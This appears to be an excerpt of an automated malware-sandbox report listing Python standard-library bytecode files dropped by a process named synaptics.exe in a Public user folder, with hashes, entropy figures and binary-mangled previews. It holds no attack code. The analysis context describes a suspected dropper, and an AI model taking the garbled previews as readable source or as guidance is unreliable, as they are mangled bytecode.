                                                                                                                                                                                      Preview:o........'-d.........................@...s....d.Z.d.d.l.Z.d.d.l.Z.g.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.).z..Path operations common to more than one OS.Do not use directly. The OS specific modules import the appropriate.functions from this module themselves.......N)...commonprefix..exists..getatime..getctime..getmtime..getsize..isdir..isfile..samefile..sameopenfile..samestatc....................C...s*...z.t...|.....W.d.S...t.t.f.y.......Y.d.S.w.).zDTest whether a path exists. Returns False for broken symbolic linksFT)...os..stat..OSError..ValueError)...path..r...../C:\Users\Public\QExvbmVOb25l\lib\genericpath.pyr........s................r....c....................C....4...z.t...|...}.W.n...t.t.f.y.......Y.d.S.w.t...|.j...S.).z%Test whether a path is a regular fileF).r....r....r....r......S_ISREG..st_mode).r......str....r....r....r.........................r....c....................C...r....).z<Return true if
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5865
                                                                                                                                                                                      Entropy (8bit):5.142368507125213
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:j77f2UQQ4yZswKLQ4yZs9UfK9BCjbAOp280dqZqh3qX0GqQC7xr8HqRRqhBQoSqj:CXQ7ZQLQ7Z6UC7CjbrpteqZqBqX1qQCW
                                                                                                                                                                                      MD5:A61E70604F2586EB9CA34838D070C522
                                                                                                                                                                                      SHA1:7F1D9E54D4CDCCB54BB41873ACDCEB9995EB99A6
                                                                                                                                                                                      SHA-256:E87C90F8983C1D9DD7892F8DF73C9D88F9BC0AFFB9BA6510846CF6415D65DABA
                                                                                                                                                                                      SHA-512:FC74B66D1FFF971B129A1C797BB9863F2FCFD8738C03B469DAC45E7C0D24F93C29D59781F2C9CB8468DA1AFB5CFDF8C9FDF1F78C71C4A03A0368AA10374D48EA
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.g.d...Z.d.d.d.d...d.d...Z.d.d.d.d...d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d d!..Z.e...d"..Z.e...d#..Z.d$d%..Z.d&d'..Z.d(d)..Z.d*d+..Z.e.j.e.e.d,d...B.Z d.S.)-z.Filename globbing utility......N)...glob..iglob..escapeF....root_dir..dir_fd..recursivec....................C...s....t.t.|.|.|.|.d.....S.).ay...Return a list of paths matching a pathname pattern... The pattern may contain simple shell-style wildcards a la. fnmatch. However, unlike fnmatch, filenames starting with a. dot are special cases that are not matched by '*' and '?'. patterns... If recursive is true, the pattern '**' will match any files and. zero or more directories and subdirectories.. r....)...listr....)...pathnamer....r....r......r.....(C:\Users\Public\QExvbmVOb25l\lib\glob.pyr........s......r....c....................C...s....t...d.|.|.
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):6858
                                                                                                                                                                                      Entropy (8bit):5.6005305335018924
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:IdPjhwzUgQUdROKh0WXI7dQia/PE6sxt6iojyyt8NQCcx54bNdO9DF4irm/NMlSV:IRmE5+odQia3EJxtv4OmVP/4X2J4hg0
                                                                                                                                                                                      MD5:57D4CFA336C5B5F9197843C13B27C0CA
                                                                                                                                                                                      SHA1:475391705316F1EBA7A35F13F7BC64739D249981
                                                                                                                                                                                      SHA-256:BF02BDB8469AEFFAB406357D1A707B325FA0EF8709063E54B42C9F00680BABBF
                                                                                                                                                                                      SHA-512:8A31E4747A7193E2A8C7CA3B85DC1ABE6126B95D93C35AF6ED8A9205B5CAEC309B36237CC7928289257DDAADCB7C0DE0ADB15C5C96BA2B1B8E0403E7CB5AB598
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.).......................@...sl...d.Z.d.Z.e.e...Z.e.e...Z.e.d...Z.i.Z.d.d.h.Z.d.d...Z.d.d...Z.d.d.d...Z.d.d.d...Z.z.d.d.l.Z.e.Z.e.Z.e...e.j...Z.W.n...e.yG......d.Z.e.Z.e.Z.Y.n.w.z.d.d.l.m.Z...W.n*..e.yz......d.d.l.m.Z...e.d.d...e.d...D.....Z.e.d.d...e.d...D.....Z.d.d.d...Z.Y.n.w.z.d.d.l.m.Z...W.n...e.y.......Y.n.w.e.D.].Z.z.e.e...e...e.<.W.q...e.y.......d.d.l.Z.e...d.e.....Y.q.w.[.[.[.[.[.[.d.S.).a3...hashlib module - A common interface to many hash functions...new(name, data=b'', **kwargs) - returns a new hash object implementing the. given hash function; initializing the hash. using the given binary data...Named constructor functions are also available, these are faster.than using new(name):..md5(), sha1(), sha224(), sha256(), sha384(), sha512(), blake2b(), blake2s(),.sha3_224, sha3_256, sha3_384, sha3_512, shake_128, and shake_256...More algorithms may be available on your platform but the above are guaranteed
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):13878
                                                                                                                                                                                      Entropy (8bit):5.354220422069604
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:ynqTYZnQtot7ItafyjjWya/PX1FGRxibJWiTqe0hN2leov+Ugn:ynEYZn0ot7It7j3aX1gRxiM0uN2kk+/n
                                                                                                                                                                                      MD5:25263BE9F31D3B221CDA1709DA5133E3
                                                                                                                                                                                      SHA1:5ADC962AB28CD3BA3BCA15A83938219EF1088E29
                                                                                                                                                                                      SHA-256:04676B577706905227D29ED2A672D792AA9F272C114F487AA0A145D785883129
                                                                                                                                                                                      SHA-512:C1EDE307577B1611CEF580FCDE0650E288F577A4272DE64B4399418EDAE544450BC9C5C69EBE1F87C602BF79B0AA697A0FE2533DBB97FAA321ECD3E30C02D671
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.[.......................@...sD...d.Z.d.Z.g.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d.d...d.d...Z.d*d d!..Z.d*d"d#..Z.z.d$d%l.T.W.n...e.yY......Y.n.w.z.d$d&l.m.Z...W.n...e.yk......Y.n.w.z.d$d'l.m.Z...W.n...e.y}......Y.n.w.z.d$d(l.m.Z...W.n...e.y.......Y.n.w.e.d)k.r.d$d.l.Z.e.e.........d.S.d.S.)+a....Heap queue algorithm (a.k.a. priority queue)...Heaps are arrays for which a[k] <= a[2*k+1] and a[k] <= a[2*k+2] for.all k, counting elements from 0. For the sake of comparison,.non-existing elements are considered to be infinite. The interesting.property of a heap is that a[0] is always its smallest element...Usage:..heap = [] # creates an empty heap.heappush(heap, item) # pushes a new item on the heap.item = heappop(heap) # pops the smallest item from the heap.item = heap[0] # smallest item on the heap without popping it.heapify(x) # transforms list into a heap, in-place, in linear time
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):6986
                                                                                                                                                                                      Entropy (8bit):5.299114930107523
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:L+FTSdeLSo3yfjb/3xXrCx5PgT1nxc203AbC:L+FT0eLhyX1K5S1nv0QbC
                                                                                                                                                                                      MD5:3B8718E9231054E1A9E52CD41A16C5DD
                                                                                                                                                                                      SHA1:D64AF307C65F741D0FCBE944270B8A2B288A2A38
                                                                                                                                                                                      SHA-256:A8379736EB3DBA94C7E479F1EC8734536787747C82FF43CABEFEBD3AA7343D2E
                                                                                                                                                                                      SHA-512:711066D8FB0A259A0068E08793AD7FDEF510934F6E66E180D0D617B6561322181437463E9C8A6F1450EEE4C656E6B9B54C2D4DAC74A1D714E5AF70CBD3D2FBAB
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...s....d.Z.d.d.l.Z.z.d.d.l.Z.W.n...e.y.......d.Z.d.Z.d.d.l.m.Z...Y.n.w.e.j.Z.e.e.j...Z.d.d.l.Z.e.d.d...e.d...D.....Z.e.d.d...e.d...D.....Z.d.Z.G.d.d...d...Z.d.d.d...Z.d.d...Z.d.S.).zqHMAC (Keyed-Hashing for Message Authentication) module...Implements the HMAC algorithm as described by RFC 2104.......N)..._compare_digestc....................c..........|.].}.|.d.A.V...q.d.S.)..\...N.......0..xr....r.....(C:\Users\Public\QExvbmVOb25l\lib\hmac.py..<genexpr>.............r.........c....................c...r....)..6...Nr....r....r....r....r....r........r....c....................@...sf...e.Z.d.Z.d.Z.d.Z.d.Z.d.d.d...Z.d.d...Z.d.d...Z.e.d.d.....Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.)...HMACz~RFC 2104 HMAC class. Also complies with RFC 4231... This supports the API for Cryptographic Hash Functions (PEP 247).. .@...)..._hmac.._inner.._outer..block_size..digest_sizeN..c....................C...s....t.|.t.t.f...s.t.d.t.|...j.......|.s.t.d.....t.r<
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):85166
                                                                                                                                                                                      Entropy (8bit):5.490092865884726
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:1536:QRc0NzW1X0tJcqYqOWjXHdV352ox842jTk9VBbL+xSjiN2TjJXTpsWTp5JQVXiG0:QRvtW1o737HdV35KNPKmwHtQVSG82IQk
                                                                                                                                                                                      MD5:459415DCF56CFBA3FBEC2E1BC729F0AC
                                                                                                                                                                                      SHA1:2FD76C28D51EFD48F0AF19CEE95EB72BA6422BAC
                                                                                                                                                                                      SHA-256:180A5BFD31F0499BD160C428C5A0D17ABCD3047BC98D9F8655B3CC1C56B3D5DC
                                                                                                                                                                                      SHA-512:E2272CBE052000029557473AFC45FB0F91379AA3BC8E4938AB10A611D90A771584D9971BCE5AEFF872A13764058D81F9734EB76DA958557DAFB3DDFF0D0533C9
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...s....d.Z.d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...e...Z.e.j.....D.].\.Z.Z.e.e.d.e...<.q^d.Z.d.d.d.d...d.d...Z d.d...Z!d.d...Z"d.d...Z#d.d...Z$d.d...Z%e&e.d...r.d.d...Z'n.d.d...Z'e&e.d...r.d.d...Z(n.d.d...Z(d.d...Z)d d!..Z*d"d#..Z+d$d%..Z,d&d'..Z-d(d)..Z.d*d+..Z/d,d-..Z0d.d/..Z1d0d1..Z2d2d3..Z3d4d5..Z4d6d7..Z5d8d9..Z6d:d;..Z7d.d<d=..Z8e.d>d?..Z9d@dA..Z:dBdC..Z;d.dD..dEdF..Z<dGdH..Z=dIdJ..Z>dKdL..Z?dMdN..Z@dOdP..ZAdQdR..ZBdSdT..ZCdUdV..ZDd.dWdX..ZEi.ZFi.ZGd.dYdZ..ZHG.d[d\..d\eI..ZJG.d]d^..d^e.jK..ZLd_d`..ZMdadb..ZNG.dcdd..ddeI..ZOG.dedf..df..ZPdgdh..ZQdidj..ZRdkdl..ZSdmdn..ZTd.dodp..ZUe.dqdr..ZVdsdt..ZWe.dudv..ZXdwdx..ZYe.dydz..ZZd{d|..Z[e.d}d~..Z\d.d...Z]d.d.d...Z^d.d...Z_d.d.d.d.i.i.e`d.d...d.d...d.d...d.d...e^f.d.d...Zae`d.d...d.d...d.d...f.d.d...Zbd.d...Zcd.d...Zdd.d...Zee.d.d...Zfd.d...Zge.d.d...Zhd.d.d...Zid.d...Zje.
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3676
                                                                                                                                                                                      Entropy (8bit):5.3972600816288
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:7jeBVAsKEv1YlurRNZsmi/VA61vWF/3+XIQjC2Ai3QuAXuhgwG8POcGcMzzMfSWI:7UK0iSxOmoWF2vLAy/hy8P7GcmYa7RXn
                                                                                                                                                                                      MD5:5EC5293CF8812BA369E7F7265F6C7352
                                                                                                                                                                                      SHA1:6402078F1D345F28998103D56E8C1A393CDC86CD
                                                                                                                                                                                      SHA-256:771129848349DF76B7EFAC47E985ACF72FA4AD8C735CF99CEED191502807065E
                                                                                                                                                                                      SHA-512:596D1FFD992710FFD71CD7ACC2284598F978FD988D4CBF7FCD9C0E8ADBA618A9953CB374DB4704D6485B0B3711BA3F661221276B25AFCFA380A0500AC39A0525
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...sH...d.Z.d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d...Z.d.e._.d.Z.d.Z.d.Z.G.d.d...d.e.j.e.j.d...Z.G.d.d...d.e.j.e...Z.G.d.d...d.e.j.e...Z.G.d.d...d.e.j e...Z!e.."e.....e.e.e.e.e.f.D.].Z#e.."e#....que.e.f.D.].Z#e!."e#....q.[#z.d.d.l.m$Z$..W.n...e%y.......Y.d.S.w.e.."e$....d.S.).a....The io module provides the Python interfaces to stream handling. The.builtin open function is defined in this module...At the top of the I/O hierarchy is the abstract base class IOBase. It.defines the basic interface to a stream. Note, however, that there is no.separation between reading and writing to streams; implementations are.allowed to raise an OSError if they do not support a given operation...Extending IOBase is RawIOBase which deals simply with the reading and.writing of raw bytes to a stream. FileIO subclasses RawIOBase to provide.an interface to OS files...BufferedIOBase deals with buffering on a raw
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):61464
                                                                                                                                                                                      Entropy (8bit):5.306395675246755
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:1536:11qqs3deqQmjuqJqq9qhIOGqaqzIVqOq/sqmqeXWqJqZqoqfqEqNqqBNqzSq2qfe:8amjPaWNFGc81veYm1o4Jg5wLlf8x7LR
                                                                                                                                                                                      MD5:057B351C81584E9BCED8FC280316481B
                                                                                                                                                                                      SHA1:748EEFF2FDFEE868D6E0114D0FB5A192D6CE8425
                                                                                                                                                                                      SHA-256:15D26F6A8541F21624DF312769241FAE55729D524E3D773852692290D836B3D7
                                                                                                                                                                                      SHA-512:0B415F273302EDA2FA691B81912EBEA499E204740DE301F786FF89D2D9A2335192B9F0B2528BBDAD44BDAECA4E1B9C385266E6E39C340C5DC0E7C255EBB2D965
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.,.......................@...s....d.Z.d.Z.d.d.l.Z.d.Z.d.Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.d...Z.d=d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d ..Z.d!d"..Z.G.d#d$..d$..Z.d.a.e.j.G.d%d&..d&e.....Z.e.j.G.d'd(..d(e.....Z.G.d)d*..d*..Z.G.d+d,..d,e.e...Z.G.d-d...d.e...Z.G.d/d0..d0e.e...Z.G.d1d2..d2..Z.e.e._.G.d3d4..d4..Z.G.d5d6..d6e.e...Z G.d7d8..d8e ..Z!G.d9d:..d:e.e...Z"G.d;d<..d<..Z#e#e _.d.S.)>z.A fast, lightweight IPv4/IPv6 manipulation library in Python...This library is used to create/poke/manipulate IPv4 and IPv6 addresses.and networks...z.1.0.....N. .......c....................@........e.Z.d.Z.d.Z.d.S.)...AddressValueErrorz%A Value Error related to the address.N....__name__..__module__..__qualname__..__doc__..r....r.....-C:\Users\Public\QExvbmVOb25l\lib\ipaddress.pyr.................r....c....................@...r....)...NetmaskValueErrorz%A Value Error related to the netmask.Nr....r....r....r....r....r........r....r....c................
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):940
                                                                                                                                                                                      Entropy (8bit):5.420740346729624
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:TBMgKEVTSAvFwzVCI0L67avc0Kb4S0bJB674u:TzVu8wzVmxcZt0bJB65
                                                                                                                                                                                      MD5:7F3D3B359109464CAF1E0DC4DC506971
                                                                                                                                                                                      SHA1:EA38967BAAEFE9E5CFA0B651F30B46EB83B56A28
                                                                                                                                                                                      SHA-256:4F8A4618F7F19F8C489CA8BBB82D97071C77A1203DE5276DA8108A67F0E463F1
                                                                                                                                                                                      SHA-512:0398FF2617BAA1CAB5E24AECEF00394E98FD6B4CF71ACB535977284252154D288AA75F68FC810A2C3F42ADF2F58489BA76E8F3BBC0F7D847407EC9965A6FEFA4
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-dd........................@...s4...d.Z.g.d...Z.g.d...Z.g.d...Z.e.e...j.Z.e.e...j.Z.d.S.).a....Keywords (from "Grammar/python.gram")..This file is automatically generated; please don't muck it up!..To update the symbols in this file, 'cd' to the top directory of.the python source tree and run:.. PYTHONPATH=Tools/peg_generator python3 -m pegen.keywordgen Grammar/python.gram Grammar/Tokens Lib/keyword.py..Alternatively, you can run 'make regen-keyword'..)...iskeyword..issoftkeyword..kwlist..softkwlist)#..False..None..TrueZ.andZ.asZ.assertZ.asyncZ.awaitZ.break..classZ.continueZ.defZ.delZ.elifZ.elseZ.exceptZ.finallyZ.forZ.fromZ.globalZ.ifZ.import..inZ.is..lambdaZ.nonlocalZ.notZ.orZ.passZ.raise..returnZ.tryZ.whileZ.withZ.yield)..._Z.case..matchN)...__doc__..__all__r....r......frozenset..__contains__r....r......r....r.....+C:\Users\Public\QExvbmVOb25l\lib\keyword.py..<module>....s...........&....
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):4155
                                                                                                                                                                                      Entropy (8bit):5.325878719236098
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:0Z1XLppmx0pYUG0wzU182J691Tc7mh5ae7y8:4PyN10wzg6TTc7mh5vD
                                                                                                                                                                                      MD5:133CF64ECAC33C70B434A9707C5A5CF3
                                                                                                                                                                                      SHA1:A51AB06A3B28F26428DCD830462D7B0FFC0AAAEC
                                                                                                                                                                                      SHA-256:9E36FC7BDDEAA3D8E19C2DCFD08A69A11170C715DA578530DFE3F599A51AB040
                                                                                                                                                                                      SHA-512:67C3B676D3A17FE54E6A5677525EA85D236EDED772DA5F25306EE2552A0FB06ABF18F022F5A6AF699DB45E5C90FA40F5BECA89B42F6D78DA928CEBE6B2EBC1F9
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...sl...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.g.d...Z.i.Z.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d...Z.d.S.).z.Cache lines from Python source files...This is intended to read lines from modules imported -- hence if a filename.is not found, it will look down the module search path for a file by.that name.......N)...getline..clearcache..checkcache..lazycachec....................C...s....t.......d.S.).z.Clear the cache entirely.N)...cache..clear..r....r.....-C:\Users\Public\QExvbmVOb25l\lib\linecache.pyr........s......r....c....................C...s8...t.|.|...}.d.|.....k.r.t.|...k.r.n...d.S.|.|.d.....S.d.S.).z~Get a line for a Python source file from the cache.. Update the cache if it doesn't contain an entry for this file already........)...getlines..len)...filename..lineno..module_globals..linesr....r....r....r........s..............r....c....................C...sR...|.t.v.r.t.|...}.t.|...d.k.r.t.|...d...S.z.t.|.|...W.S...t.y(......t...
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):46178
                                                                                                                                                                                      Entropy (8bit):6.062416669975893
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:45YArctK0pztzQUB04zzRYKJFSd6tmm+a4L+P9cLjYp:I1YKGzbB04zVYAFU6x+a4aPuL8p
                                                                                                                                                                                      MD5:B274D608C3ECDE7DBA935464C3FDD0F9
                                                                                                                                                                                      SHA1:38CB33EE40CBDF0136CA3D8C75B647B8ABE13FD3
                                                                                                                                                                                      SHA-256:266F757C064DCAE7C96551B88A3CDB90E04EC17D742DA25850F78E7B0E47AEA4
                                                                                                                                                                                      SHA-512:5FCE4C23FED736A46D18ACD5242CCFB2FDF89D6BBE917E46B71A27AC0ED07B4A9B0C575537C953384D95A4EFD3D80E8485F64B485A8948C2B309B2F8ED92B13D
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.8.......................@...sF"..d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.Z.g.d...Z.d.d...Z.d.d...Z.z.d.d.l.T.W.n%..e.yW......d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.e.Z.d.d...Z...d.d.d...Z.Y.n.w.d.e...v.r_e.Z.d.e...v.rfe.Z.e.Z.i.Z.e.. e...d.d.....Z.d.d...Z!..d.d.d...Z"d.d...Z#e..$d...Z%..d.d d!..Z&..d.d"d#..Z'..d.d$d%..Z(..d.d&d'..Z)..d.d)d*..Z*d+d,..Z.d-d...Z+..d.d/d0..Z,e-f.d1d2..Z.d3d4..Z/d5d6..Z0e.Z1d7d8..Z2d9d:..Z3d;d<..Z4d=d>..Z5d?d@..Z6..d.dBdC..Z7e.f.dDdE..Z8..d.dFd...Z.e.f.dGdH..Z9z.d.dIl.m:Z:..W.n...e...y.......dJdK..Z:Y.n.w.z.e;..W.n...e<..y.........d.dLdM..Z=Y.n.w...d.dNdM..Z=i.dOdP..dQdP..dRdS..dTdU..dVdU..dWdX..dYdZ..d[d\..d]d^..d_d`..dadS..dbdc..ddde..dfdg..dhdS..didS..djdS..i.dkdl..dmdn..dodp..dqdr..dsdg..dtdu..dvdc..dwdx..dydz..d{de..d|d}..d~d...d.d...d.d...d.dU..d.d...d.d.....dXd.d.d.d.d.d.d\d^d`d.....Z>e?e>.@....D.].\.ZAZBeA.Cd.d...ZAe>.DeAeB......q.i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):12113
                                                                                                                                                                                      Entropy (8bit):5.3787135439915765
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:d+KxmpkRLMC//oP1UHyszdKXnoGwKjwmAKa09hs4Nr:Tmo2UHtgNAKl9hs45
                                                                                                                                                                                      MD5:F0EC866C8A861B5EBCCC780C4C0516C8
                                                                                                                                                                                      SHA1:5656D5D52C3FE4DAC8D76B54CA58E44E7BC42F21
                                                                                                                                                                                      SHA-256:CE6E5F552D93BA306C74107AAEF541F687BCA9646F4BE7BAFE01B2D60C59C199
                                                                                                                                                                                      SHA-512:4AEBBC089A2FC56D9096564EC9B071EAC17A89C79A51FB74A3C7F72C7C7CCA5112F3EB66BE9501BDB9BCF77D4A10A677FA5877D429452C072A6329FF233B62D0
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-dA5.......................@...s....d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.T.d.d.l.m.Z.m.Z...d.d.l.Z.d.Z.d.Z.d.Z.G.d.d...d.e.j...Z.d.d.d.d.d.d.d.d.d...d.d...Z.e.d.d.d.f.d.d...Z.e.d.d.f.d.d...Z.d.S.).aS...Interface to the liblzma compression library...This module provides a class for reading and writing compressed files,.classes for incremental (de)compression, and convenience functions for.one-shot (de)compression...These classes and functions support both the XZ and legacy LZMA.container formats, as well as raw compressed data streams..)$Z.CHECK_NONEZ.CHECK_CRC32Z.CHECK_CRC64Z.CHECK_SHA256Z.CHECK_ID_MAXZ.CHECK_UNKNOWNZ.FILTER_LZMA1Z.FILTER_LZMA2Z.FILTER_DELTAZ.FILTER_X86Z.FILTER_IA64Z.FILTER_ARMZ.FILTER_ARMTHUMBZ.FILTER_POWERPCZ.FILTER_SPARC..FORMAT_AUTO..FORMAT_XZZ.FORMAT_ALONEZ.FORMAT_RAWZ.MF_HC3Z.MF_HC4Z.MF_BT2Z.MF_BT3Z.MF_BT4Z.MODE_FASTZ.MODE_NORMALZ.PRESET_DEFAULTZ.PRESET_EXTREME..LZMACompressor..LZMADecompressor..LZMAFile..LZMAError..open..compress..decompressZ.is_c
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):17632
                                                                                                                                                                                      Entropy (8bit):5.6765285238011005
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:mmMcSuUoigjrH1V19yB/sWG5D+nTF+jZjB77rXw0:mjzgl0sWm4+jZjNw0
                                                                                                                                                                                      MD5:0FFA9621297DF9C739DF2A54F70FE8D2
                                                                                                                                                                                      SHA1:E055F51463CE120828108430A099D1572CAB5373
                                                                                                                                                                                      SHA-256:3535E9E66B1D7C49133B8FE5F24EDB63AF49DEDEA4660646FEB4DAFC6EB624B3
                                                                                                                                                                                      SHA-512:D9C3A26B78EDCED15672746E5C7C929E3572AE2DF7C5B59AC6363951C8437E0E4C16704CBCF5C9B419B6604C405D2C6F1B6D63B913518EE185CF067426EFB096
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.Z.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.z.d.d.l.m.Z...W.n...e.y%......d.Z.Y.n.w.z.d.d.l.Z.W.n...e.y7......d.Z.Y.n.w.g.d...Z.g.d...Z.d.a.d.a.G.d.d...d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d...Z.d.d...Z.e.....d.d...Z.e.d.k.r|e.....d.S.d.S.).a....Guess the MIME type of a file...This module defines two useful functions:..guess_type(url, strict=True) -- guess the MIME type and encoding of a URL...guess_extension(type, strict=True) -- guess the extension for a given MIME type...It also contains the following, for tuning the behavior:..Data:..knownfiles -- list of files to parse.inited -- flag set when init() has been called.suffix_map -- dictionary mapping suffixes to suffixes.encodings_map -- dictionary mapping suffixes to encodings.types_map -- dictionary mapping suffixes to types..Functions:..init([files]) -- parse a list of files, default knownfiles (on Windows, the. default values are taken from the registry).read_mime_types(
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3946
                                                                                                                                                                                      Entropy (8bit):5.481114302614267
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:88lwQqPqiKqqHW7Nd5pqKHQwmHv35UmyhWqgv0+USVqtnqqgqhy:888Pq/qq27NVqKleemdq8LvVqtnqqgqU
                                                                                                                                                                                      MD5:2DB8CC3CB04A17FFE46180922A151DE8
                                                                                                                                                                                      SHA1:0D9A07B50F1DE042A956ADC70A6DAD9B0D82C05D
                                                                                                                                                                                      SHA-256:8E42195C5ED61254F2CDC78EC49CBB5016DD33466BC2CDEFA22C26A431B21C0E
                                                                                                                                                                                      SHA-512:9BF44DF143A974B3EBA26A3D4A4C5836D3117A37F3F24956F4CCA025E115F7801A7D5F039DFBEB4C3E84C25826C3C1DB363936FDF0494ECD7282BCAC2E4706AD
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
